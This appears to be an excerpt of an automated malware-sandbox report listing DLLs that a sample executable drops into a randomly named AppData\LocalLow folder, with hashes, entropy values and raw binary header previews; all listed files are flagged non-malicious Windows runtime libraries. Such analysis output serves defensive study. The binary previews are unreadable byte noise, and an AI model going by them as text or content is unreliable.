Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L... ..............!......................... ...............................0.......-....@.......................................... ..................8=..............T............................................................................text............................... ..`.rsrc........ ......................@..@.... ...........=...T...T....... ...........d............... .......................RSDS...IK..XM.&......api-ms-win-core-namedpipe-l1-1-0.pdb............T....rdata..T........rdata$zzzdbg............edata... ..`....rsrc$01....` .......rsrc$02................ .......................(...P...x...............:...w...............O...y...............&...W...............=...j.......................api-ms-win-core-namedpipe-l1-1-0.dll.ConnectNamedPipe.kernel32.ConnectNamedPipe.CreateNamedP

C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-core-processenvironment-l1-1-0.dll Download File
Process:	C:\Users\user\Desktop\eLZzxG56uH.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	19248
Entropy (8bit):	7.073730829887072
Encrypted:	false
SSDEEP:	192:wXjWIghWGd4dsNtL/123Ouo+Uggs/nGfe4pBjSXcYddWh0txKdmVWQ4SW04engo5:MjWPhWHsnhi00GftpBjW7emOj5l1z6hP
MD5:	5F73A814936C8E7E4A2DFD68876143C8
SHA1:	D960016C4F553E461AFB5B06B039A15D2E76135E
SHA-256:	96898930FFB338DA45497BE019AE1ADCD63C5851141169D3023E53CE4C7A483E
SHA-512:	77987906A9D248448FA23DB2A634869B47AE3EC81EA383A74634A8C09244C674ECF9AADCDE298E5996CAFBB8522EDE78D08AAA270FD43C66BEDE24115CDBDFED
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L...).r............!......................... ...............................0.......:....@.............................G............ ..................0=..............T............................................................................text...G........................... ..`.rsrc........ ......................@..@....).r.........F...T...T.......).r.........d...............).r.....................RSDS.6..~x.......'......api-ms-win-core-processenvironment-l1-1-0.pdb...........T....rdata..T........rdata$zzzdbg.......G....edata... ..`....rsrc$01....` .......rsrc$02........).r.....................(...\|.......B...............$...M...{...............P...................6...k.............../...(...e...............=...f...............8...q...............!...T............... ...........................

C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-core-processthreads-l1-1-0.dll Download File
Process:	C:\Users\user\Desktop\eLZzxG56uH.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	19392
Entropy (8bit):	7.082421046253008
Encrypted:	false
SSDEEP:	384:afk1JzNcKSIJWPhW2snhi00GftpBjZqcLvemr4PlgC:RcKST+nhoi/BbeGv
MD5:	A2D7D7711F9C0E3E065B2929FF342666
SHA1:	A17B1F36E73B82EF9BFB831058F187535A550EB8
SHA-256:	9DAB884071B1F7D7A167F9BEC94BA2BEE875E3365603FA29B31DE286C6A97A1D
SHA-512:	D436B2192C4392A041E20506B2DFB593FE5797F1FDC2CDEB2D7958832C4C0A9E00D3AEA6AA1737D8A9773817FEADF47EE826A6B05FD75AB0BDAE984895C2C4EF
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L..................!......................... ...............................0......l.....@.......................................... ...................9..............T............................................................................text............................... ..`.rsrc........ ......................@..@................B...T...T...................d.......................................RSDS..t........=j.......api-ms-win-core-processthreads-l1-1-0.pdb...........T....rdata..T........rdata$zzzdbg............edata... ..`....rsrc$01....` .......rsrc$02............................1...1...(...........K...x...............,...`...................C...q...............'...N...y..............."...I...{...............B...p...............,...c...............H...x...................9...S...p.......

C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-core-processthreads-l1-1-1.dll Download File
Process:	C:\Users\user\Desktop\eLZzxG56uH.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	18744
Entropy (8bit):	7.1156948849491055
Encrypted:	false
SSDEEP:	384:xzADfIeRWPhWKEi00GftpBjj1emMVlvN0M:xzfeWeoi11ep
MD5:	D0289835D97D103BAD0DD7B9637538A1
SHA1:	8CEEBE1E9ABB0044808122557DE8AAB28AD14575
SHA-256:	91EEB842973495DEB98CEF0377240D2F9C3D370AC4CF513FD215857E9F265A6A
SHA-512:	97C47B2E1BFD45B905F51A282683434ED784BFB334B908BF5A47285F90201A23817FF91E21EA0B9CA5F6EE6B69ACAC252EEC55D895F942A94EDD88C4BFD2DAFD
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L....9.............!......................... ...............................0......k.....@.......................................... ..................8=..............T............................................................................text............................... ..`.rsrc........ ......................@..@.....9..........B...T...T........9..........d................9......................RSDS&.n....5..l....)....api-ms-win-core-processthreads-l1-1-1.pdb...........T....rdata..T........rdata$zzzdbg............edata... ..`....rsrc$01....` .......rsrc$02.............9......................(...`...........-...l..........."...W...................N...................P...............F...q...............3...r...................................api-ms-win-core-processthreads-l1-1-1.dll.FlushInstr

C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-core-profile-l1-1-0.dll Download File
Process:	C:\Users\user\Desktop\eLZzxG56uH.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	17712
Entropy (8bit):	7.187691342157284
Encrypted:	false
SSDEEP:	192:w9WIghWGdUuDz7M123Ouo+Uggs/nGfe4pBjSXrw58h6Wh0txKdmVWQ4SW7QQtzko:w9WPhWYDz6i00GftpBjXPemD5l1z6hv
MD5:	FEE0926AA1BF00F2BEC9DA5DB7B2DE56
SHA1:	F5A4EB3D8AC8FB68AF716857629A43CD6BE63473
SHA-256:	8EB5270FA99069709C846DB38BE743A1A80A42AA1A88776131F79E1D07CC411C
SHA-512:	0958759A1C4A4126F80AA5CDD9DF0E18504198AEC6828C8CE8EB5F615AD33BF7EF0231B509ED6FD1304EEAB32878C5A649881901ABD26D05FD686F5EBEF2D1C3
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L....&............!......................... ...............................0......0.....@.......................................... ..................0=..............T............................................................................text............................... ..`.rsrc........ ......................@..@.....&.........;...T...T........&.........d................&.....................RSDS...O.""#.n....D:....api-ms-win-core-profile-l1-1-0.pdb..........T....rdata..T........rdata$zzzdbg............edata... ..`....rsrc$01....` .......rsrc$02.....................&.....<...............(...0...8...w......._...........api-ms-win-core-profile-l1-1-0.dll.QueryPerformanceCounter.kernel32.QueryPerformanceCounter.QueryPerformanceFrequency.kernel32.QueryPerformanceFrequency....................

C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-core-rtlsupport-l1-1-0.dll Download File
Process:	C:\Users\user\Desktop\eLZzxG56uH.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	17720
Entropy (8bit):	7.19694878324007
Encrypted:	false
SSDEEP:	384:61G1WPhWksnhi00GftpBjEVXremWRlP55Jk:kGiYnhoiqVXreDT5Y
MD5:	FDBA0DB0A1652D86CD471EAA509E56EA
SHA1:	3197CB45787D47BAC80223E3E98851E48A122EFA
SHA-256:	2257FEA1E71F7058439B3727ED68EF048BD91DCACD64762EB5C64A9D49DF0B57
SHA-512:	E5056D2BD34DC74FC5F35EA7AA8189AAA86569904B0013A7830314AE0E2763E95483FABDCBA93F6418FB447A4A74AB0F07712ED23F2E1B840E47A099B1E68E18
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L......(...........!......................... ...............................0......}"....@.......................................... ..................8=..............T............................................................................text............................... ..`.rsrc........ ......................@..@.......(........>...T...T..........(........d..................(....................RSDS?.L.N.o.....=.......api-ms-win-core-rtlsupport-l1-1-0.pdb...........T....rdata..T........rdata$zzzdbg............edata... ..`....rsrc$01....` .......rsrc$02...................(....F...............(...4...@...~...........l.................api-ms-win-core-rtlsupport-l1-1-0.dll.RtlCaptureContext.ntdll.RtlCaptureContext.RtlCaptureStackBackTrace.ntdll.RtlCaptureStackBackTrace.RtlUnwind.ntdll.RtlUnwind.

C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-core-string-l1-1-0.dll Download File
Process:	C:\Users\user\Desktop\eLZzxG56uH.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	18232
Entropy (8bit):	7.137724132900032
Encrypted:	false
SSDEEP:	384:xyMvRWPhWFs0i00GftpBjwCJdemnflUG+zI4:xyMvWWoibeTnn
MD5:	12CC7D8017023EF04EBDD28EF9558305
SHA1:	F859A66009D1CAAE88BF36B569B63E1FBDAE9493
SHA-256:	7670FDEDE524A485C13B11A7C878015E9B0D441B7D8EB15CA675AD6B9C9A7311
SHA-512:	F62303D98EA7D0DDBE78E4AB4DB31AC283C3A6F56DBE5E3640CBCF8C06353A37776BF914CFE57BBB77FC94CCFA48FAC06E74E27A4333FBDD112554C646838929
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L.....R............!......................... ...............................0.......\....@.......................................... ..................8=..............T............................................................................text............................... ..`.rsrc........ ......................@..@......R.........:...T...T.........R.........d.................R.....................RSDS..D..a..1.f....7....api-ms-win-core-string-l1-1-0.pdb...........T....rdata..T........rdata$zzzdbg............edata... ..`....rsrc$01....` .......rsrc$02......................R.....x...............(...H...h...............)...O...x...........................>...i...........................api-ms-win-core-string-l1-1-0.dll.CompareStringEx.kernel32.CompareStringEx.CompareStringOrdinal.kernel32.Compare

C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-core-synch-l1-1-0.dll Download File
Process:	C:\Users\user\Desktop\eLZzxG56uH.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	20280
Entropy (8bit):	7.04640581473745
Encrypted:	false
SSDEEP:	384:5Xdv3V0dfpkXc0vVaHWPhWXEi00GftpBj9em+4lndanJ7o:5Xdv3VqpkXc0vVa8poivex
MD5:	71AF7ED2A72267AAAD8564524903CFF6
SHA1:	8A8437123DE5A22AB843ADC24A01AC06F48DB0D3
SHA-256:	5DD4CCD63E6ED07CA3987AB5634CA4207D69C47C2544DFEFC41935617652820F
SHA-512:	7EC2E0FEBC89263925C0352A2DE8CC13DA37172555C3AF9869F9DBB3D627DD1382D2ED3FDAD90594B3E3B0733F2D3CFDEC45BC713A4B7E85A09C164C3DFA3875
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L......2...........!......................... ...............................0............@.............................V............ ..................8=..............T............................................................................text...V........................... ..`.rsrc........ ......................@..@.......2........9...T...T..........2........d..................2....................RSDS...z..C...+Q_.....api-ms-win-core-synch-l1-1-0.pdb............T....rdata..T........rdata$zzzdbg.......V....edata... ..`....rsrc$01....` .......rsrc$02.......................2............)...)...(.......p.......1...c...................!...F...m...............$...X...........$...[.......................@...i...............!...Q.......................[...............7...........O...................

C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-core-synch-l1-2-0.dll Download File
Process:	C:\Users\user\Desktop\eLZzxG56uH.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	18744
Entropy (8bit):	7.138910839042951
Encrypted:	false
SSDEEP:	384:JtZ3gWPhWFA0i00GftpBj4Z8wemFfYlP55t:j+oiVweb53
MD5:	0D1AA99ED8069BA73CFD74B0FDDC7B3A
SHA1:	BA1F5384072DF8AF5743F81FD02C98773B5ED147
SHA-256:	30D99CE1D732F6C9CF82671E1D9088AA94E720382066B79175E2D16778A3DAD1
SHA-512:	6B1A87B1C223B757E5A39486BE60F7DD2956BB505A235DF406BCF693C7DD440E1F6D65FFEF7FDE491371C682F4A8BB3FD4CE8D8E09A6992BB131ADDF11EF2BF9
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L...XuY...........!......................... ...............................0......3.....@.............................v............ ..................8=..............T............................................................................text...v........................... ..`.rsrc........ ......................@..@....XuY........9...T...T.......XuY........d...............XuY....................RSDS.V..B...`..S3.....api-ms-win-core-synch-l1-2-0.pdb............T....rdata..T........rdata$zzzdbg.......v....edata... ..`....rsrc$01....` .......rsrc$02....................X*uY....................(...l...........R...................W...............&...b...............$...W.......6...w...............;...\|...............H...................A.....................................api-ms-win-core-synch-

C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-core-sysinfo-l1-1-0.dll Download File
Process:	C:\Users\user\Desktop\eLZzxG56uH.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	19248
Entropy (8bit):	7.072555805949365
Encrypted:	false
SSDEEP:	384:2q25WPhWWsnhi00GftpBj1u6qXxem4l1z6hi:25+SnhoiG6IeA8
MD5:	19A40AF040BD7ADD901AA967600259D9
SHA1:	05B6322979B0B67526AE5CD6E820596CBE7393E4
SHA-256:	4B704B36E1672AE02E697EFD1BF46F11B42D776550BA34A90CD189F6C5C61F92
SHA-512:	5CC4D55350A808620A7E8A993A90E7D05B441DA24127A00B15F96AAE902E4538CA4FED5628D7072358E14681543FD750AD49877B75E790D201AB9BAFF6898C8D
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L.....C=...........!......................... ...............................0............@.............................E............ ..................0=..............T............................................................................text...E........................... ..`.rsrc........ ......................@..@......C=........;...T...T.........C=........d.................C=....................RSDS....T.>eD.#\|.../....api-ms-win-core-sysinfo-l1-1-0.pdb..........T....rdata..T........rdata$zzzdbg.......E....edata... ..`....rsrc$01....` .......rsrc$02......................C=....................(...........:...i...............N...................7...s...............+...M...r.............../...'...V...............:...k...................X............... ...?...d..............."...................

C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-core-timezone-l1-1-0.dll Download File
Process:	C:\Users\user\Desktop\eLZzxG56uH.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	18224
Entropy (8bit):	7.17450177544266
Encrypted:	false
SSDEEP:	384:SWPhWK3di00GftpBjH35Gvem2Al1z6hIu:77NoiOve7eu
MD5:	BABF80608FD68A09656871EC8597296C
SHA1:	33952578924B0376CA4AE6A10B8D4ED749D10688
SHA-256:	24C9AA0B70E557A49DAC159C825A013A71A190DF5E7A837BFA047A06BBA59ECA
SHA-512:	3FFFFD90800DE708D62978CA7B50FE9CE1E47839CDA11ED9E7723ACEC7AB5829FA901595868E4AB029CDFB12137CF8ECD7B685953330D0900F741C894B88257B
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L....Y.x...........!......................... ...............................0......}3....@.......................................... ..................0=..............T............................................................................text............................... ..`.rsrc........ ......................@..@.....Y.x........<...T...T........Y.x........d................Y.x....................RSDS.^.b. .t.H.a.......api-ms-win-core-timezone-l1-1-0.pdb.........T....rdata..T........rdata$zzzdbg............edata... ..`....rsrc$01....` .......rsrc$02.....................Y.x....................(...L...p...........5...s...........+...i...................U...............I.........................api-ms-win-core-timezone-l1-1-0.dll.FileTimeToSystemTime.kernel32.FileTimeToSystemTime.GetDynamicTimeZ

C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-core-util-l1-1-0.dll Download File
Process:	C:\Users\user\Desktop\eLZzxG56uH.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	18232
Entropy (8bit):	7.1007227686954275
Encrypted:	false
SSDEEP:	192:pePWIghWG4U9wluZo123Ouo+Uggs/nGfe4pBjSbKT8wuxWh0txKdmVWQ4CWnFnwQ:pYWPhWFS0i00GftpBj7DudemJlP552
MD5:	0F079489ABD2B16751CEB7447512A70D
SHA1:	679DD712ED1C46FBD9BC8615598DA585D94D5D87
SHA-256:	F7D450A0F59151BCEFB98D20FCAE35F76029DF57138002DB5651D1B6A33ADC86
SHA-512:	92D64299EBDE83A4D7BE36F07F65DD868DA2765EB3B39F5128321AFF66ABD66171C7542E06272CB958901D403CCF69ED716259E0556EE983D2973FAA03C55D3E
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L.....f............!......................... ...............................0......`k....@.............................9............ ..................8=..............T............................................................................text...)........................... ..`.rsrc........ ......................@..@......f.........8...T...T.........f.........d.................f.....................RSDS*...$.L.Rm..l.....api-ms-win-core-util-l1-1-0.pdb.........T....rdata..T........rdata$zzzdbg.......9....edata... ..`....rsrc$01....` .......rsrc$02..........f.....J...................,...@...o...................j...}.........................api-ms-win-core-util-l1-1-0.dll.Beep.kernel32.Beep.DecodePointer.kernel32.DecodePointer.DecodeSystemPointer.kernel32.DecodeSystemPointer.EncodePointer.kernel3

C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-crt-conio-l1-1-0.dll Download File
Process:	C:\Users\user\Desktop\eLZzxG56uH.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	19256
Entropy (8bit):	7.088693688879585
Encrypted:	false
SSDEEP:	384:8WPhWz4Ri00GftpBjDb7bemHlndanJ7DW:Fm0oiV7beV
MD5:	6EA692F862BDEB446E649E4B2893E36F
SHA1:	84FCEAE03D28FF1907048ACEE7EAE7E45BAAF2BD
SHA-256:	9CA21763C528584BDB4EFEBE914FAAF792C9D7360677C87E93BD7BA7BB4367F2
SHA-512:	9661C135F50000E0018B3E5C119515CFE977B2F5F88B0F5715E29DF10517B196C81694D074398C99A572A971EC843B3676D6A831714AB632645ED25959D5E3E7
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L.................!......................... ...............................0............@.......................................... ..................8=..............T............................................................................text............................... ..`.rsrc........ ......................@..@v..............................8...d...d..................d......................................RSDS....<....2..u....api-ms-win-crt-conio-l1-1-0.pdb.........d....rdata..d........rdata$zzzdbg............edata... ..`....rsrc$01....` .......rsrc$02...............T...............(.......................>...w.........../...W...p...........................,...L...l.......................,...L...m...............t...........'...^...............P...g...........................$...=...

C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-crt-convert-l1-1-0.dll Download File
Process:	C:\Users\user\Desktop\eLZzxG56uH.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	22328
Entropy (8bit):	6.929204936143068
Encrypted:	false
SSDEEP:	384:EuydWPhW7snhi00GftpBjd6t/emJlDbN:3tnhoi6t/eAp
MD5:	72E28C902CD947F9A3425B19AC5A64BD
SHA1:	9B97F7A43D43CB0F1B87FC75FEF7D9EEEA11E6F7
SHA-256:	3CC1377D495260C380E8D225E5EE889CBB2ED22E79862D4278CFA898E58E44D1
SHA-512:	58AB6FEDCE2F8EE0970894273886CB20B10D92979B21CDA97AE0C41D0676CC0CD90691C58B223BCE5F338E0718D1716E6CE59A106901FE9706F85C3ACF7855FF
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L....NE............!.........................0...............................@............@..........................................0..................8=..............T............................................................................text............................... ..`.rsrc........0......................@..@v....................NE.........:...d...d........NE.........d................NE.....................RSDS..e.7P.g^j..[....api-ms-win-crt-convert-l1-1-0.pdb...........d....rdata..d........rdata$zzzdbg............edata...0..`....rsrc$01....`0.......rsrc$02.....................NE.............z...z...8... .......(...C...^...y...........................1...N...k...............................*...E...`...y...............................5...R...o.......................,...M...n...........

C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-crt-environment-l1-1-0.dll Download File
Process:	C:\Users\user\Desktop\eLZzxG56uH.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	18736
Entropy (8bit):	7.078409479204304
Encrypted:	false
SSDEEP:	192:bWIghWGd4edXe123Ouo+Uggs/nGfe4pBjSXXmv5Wh0txKdmVWQ4SWEApkqnajPBZ:bWPhWqXYi00GftpBjBemPl1z6h2
MD5:	AC290DAD7CB4CA2D93516580452EDA1C
SHA1:	FA949453557D0049D723F9615E4F390010520EDA
SHA-256:	C0D75D1887C32A1B1006B3CFFC29DF84A0D73C435CDCB404B6964BE176A61382
SHA-512:	B5E2B9F5A9DD8A482169C7FC05F018AD8FE6AE27CB6540E67679272698BFCA24B2CA5A377FA61897F328B3DEAC10237CAFBD73BC965BF9055765923ABA9478F8
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L....jU............!......................... ...............................0......G.....@............................."............ ..................0=..............T............................................................................text...2........................... ..`.rsrc........ ......................@..@v....................jU.........>...d...d........jU.........d................jU.....................RSDSu..1.N....R.s,"\....api-ms-win-crt-environment-l1-1-0.pdb...........d....rdata..d........rdata$zzzdbg......."....edata... ..`....rsrc$01....` .......rsrc$02.................jU.....................8...............C...d...........................3...O...l....................... .......5...Z...w.......................)...F...a...........................................................

C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-crt-filesystem-l1-1-0.dll Download File
Process:	C:\Users\user\Desktop\eLZzxG56uH.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	20280
Entropy (8bit):	7.085387497246545
Encrypted:	false
SSDEEP:	384:sq6nWm5C1WPhWFK0i00GftpBjB1UemKklUG+zIOd/:x6nWm5CiooiKeZnbd/
MD5:	AEC2268601470050E62CB8066DD41A59
SHA1:	363ED259905442C4E3B89901BFD8A43B96BF25E4
SHA-256:	7633774EFFE7C0ADD6752FFE90104D633FC8262C87871D096C2FC07C20018ED2
SHA-512:	0C14D160BFA3AC52C35FF2F2813B85F8212C5F3AFBCFE71A60CCC2B9E61E51736F0BF37CA1F9975B28968790EA62ED5924FAE4654182F67114BD20D8466C4B8F
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L......h...........!......................... ...............................0......I.....@.......................................... ..................8=..............T............................................................................text............................... ..`.rsrc........ ......................@..@v......................h........=...d...d..........h........d..................h....................RSDS.....a.'..G...A.....api-ms-win-crt-filesystem-l1-1-0.pdb............d....rdata..d........rdata$zzzdbg............edata... ..`....rsrc$01....` .......rsrc$02...................h............A...A...8...<...@...........$...=...V...q...................)...M...q......................./...O...o...........................7...X...v...........................6...U...r.......................

C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-crt-heap-l1-1-0.dll Download File
Process:	C:\Users\user\Desktop\eLZzxG56uH.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	19256
Entropy (8bit):	7.060393359865728
Encrypted:	false
SSDEEP:	192:+Y3vY17aFBR4WIghWG4U9CedXe123Ouo+Uggs/nGfe4pBjSbGGAPWh0txKdmVWQC:+Y3e9WPhWFsXYi00GftpBjfemnlP55s
MD5:	93D3DA06BF894F4FA21007BEE06B5E7D
SHA1:	1E47230A7EBCFAF643087A1929A385E0D554AD15
SHA-256:	F5CF623BA14B017AF4AEC6C15EEE446C647AB6D2A5DEE9D6975ADC69994A113D
SHA-512:	72BD6D46A464DE74A8DAC4C346C52D068116910587B1C7B97978DF888925216958CE77BE1AE049C3DCCF5BF3FFFB21BC41A0AC329622BC9BBC190DF63ABB25C6
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L...J.o ...........!......................... ...............................0............@.......................................... ..................8=..............T............................................................................text............................... ..`.rsrc........ ......................@..@v...................J.o ........7...d...d.......J.o ........d...............J.o ....................RSDSq.........pkQX[....api-ms-win-crt-heap-l1-1-0.pdb..........d....rdata..d........rdata$zzzdbg............edata... ..`....rsrc$01....` .......rsrc$02........J.o ....6...............(...........c...................S.......................1...V...y.......................<...c...........................U...z...............:...u...................&...E...p.......................,...U...

C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-crt-locale-l1-1-0.dll Download File
Process:	C:\Users\user\Desktop\eLZzxG56uH.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	18744
Entropy (8bit):	7.13172731865352
Encrypted:	false
SSDEEP:	192:fiWIghWGZirX+4z123Ouo+Uggs/nGfe4pBjS/RFcpOWh0txKdmVWQ4GWs8ylDikh:aWPhWjO4Ri00GftpBjZOemSXlvNQ0
MD5:	A2F2258C32E3BA9ABF9E9E38EF7DA8C9
SHA1:	116846CA871114B7C54148AB2D968F364DA6142F
SHA-256:	565A2EEC5449EEEED68B430F2E9B92507F979174F9C9A71D0C36D58B96051C33
SHA-512:	E98CBC8D958E604EFFA614A3964B3D66B6FC646BDCA9AA679EA5E4EB92EC0497B91485A40742F3471F4FF10DE83122331699EDC56A50F06AE86F21FAD70953FE
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L...\|..O...........!......................... ...............................0......E*....@.............................e............ ..................8=..............T............................................................................text...u........................... ..`.rsrc........ ......................@..@v...................\|..O........9...d...d.......\|..O........d...............\|..O....................RSDS.X...7.......$k....api-ms-win-crt-locale-l1-1-0.pdb............d....rdata..d........rdata$zzzdbg.......e....edata... ..`....rsrc$01....` .......rsrc$02....................\|..O....................8...........5...h...............E...................$...N...t...................$...D...b...!...R............... ...s...................:...k.......................9...X...................

C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-crt-math-l1-1-0.dll Download File
Process:	C:\Users\user\Desktop\eLZzxG56uH.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	28984
Entropy (8bit):	6.6686462438397
Encrypted:	false
SSDEEP:	384:7OTEmbM4Oe5grykfIgTmLyWPhW30i00GftpBjAKemXlDbNl:dEMq5grxfInbRoiNeSp
MD5:	8B0BA750E7B15300482CE6C961A932F0
SHA1:	71A2F5D76D23E48CEF8F258EAAD63E586CFC0E19
SHA-256:	BECE7BAB83A5D0EC5C35F0841CBBF413E01AC878550FBDB34816ED55185DCFED
SHA-512:	FB646CDCDB462A347ED843312418F037F3212B2481F3897A16C22446824149EE96EB4A4B47A903CA27B1F4D7A352605D4930DF73092C380E3D4D77CE4E972C5A
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L..................!.........................@...............................P............@..............................+...........@...............4..8=..............T............................................................................text....,.......................... ..`.rsrc........@.......0..............@..@v...............................7...d...d...................d.......................................RSDSB...=........,....api-ms-win-crt-math-l1-1-0.pdb..........d....rdata..d........rdata$zzzdbg........+...edata...@..`....rsrc$01....`@.......rsrc$02................l.......:...:...(...................................(...@...X...q...............................4...M...g........................ ..= ..i ... ... ... ...!..E!..o!...!...!...!..."..F"..s"..."..."..."...#..E#..o#...#...#..

C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-crt-multibyte-l1-1-0.dll Download File
Process:	C:\Users\user\Desktop\eLZzxG56uH.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	26424
Entropy (8bit):	6.712286643697659
Encrypted:	false
SSDEEP:	384:kDy+Kr6aLPmIHJI6/CpG3t2G3t4odXL5WPhWFY0i00GftpBjbnMxem8hzlmTMiLV:kDZKrZPmIHJI64GoiZMxe0V
MD5:	35FC66BD813D0F126883E695664E7B83
SHA1:	2FD63C18CC5DC4DEFC7EA82F421050E668F68548
SHA-256:	66ABF3A1147751C95689F5BC6A259E55281EC3D06D3332DD0BA464EFFA716735
SHA-512:	65F8397DE5C48D3DF8AD79BAF46C1D3A0761F727E918AE63612EA37D96ADF16CC76D70D454A599F37F9BA9B4E2E38EBC845DF4C74FC1E1131720FD0DCB881431
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L....u'............!.....$...................@...............................P............@.............................. ...........@...............*..8=..............T............................................................................text....".......$.................. ..`.rsrc........@.......&..............@..@v....................u'.........<...d...d........u'.........d................u'.....................RSDS7.%..5..+...+.....api-ms-win-crt-multibyte-l1-1-0.pdb.........d....rdata..d........rdata$zzzdbg........ ...edata...@..`....rsrc$01....`@.......rsrc$02.....................u'.....................8...X...x...;...`.......................1...T...w...................'...L...q.......................B...e.......................7...Z...}...................+...L...m.......................

C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-crt-private-l1-1-0.dll Download File
Process:	C:\Users\user\Desktop\eLZzxG56uH.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	73016
Entropy (8bit):	5.838702055399663
Encrypted:	false
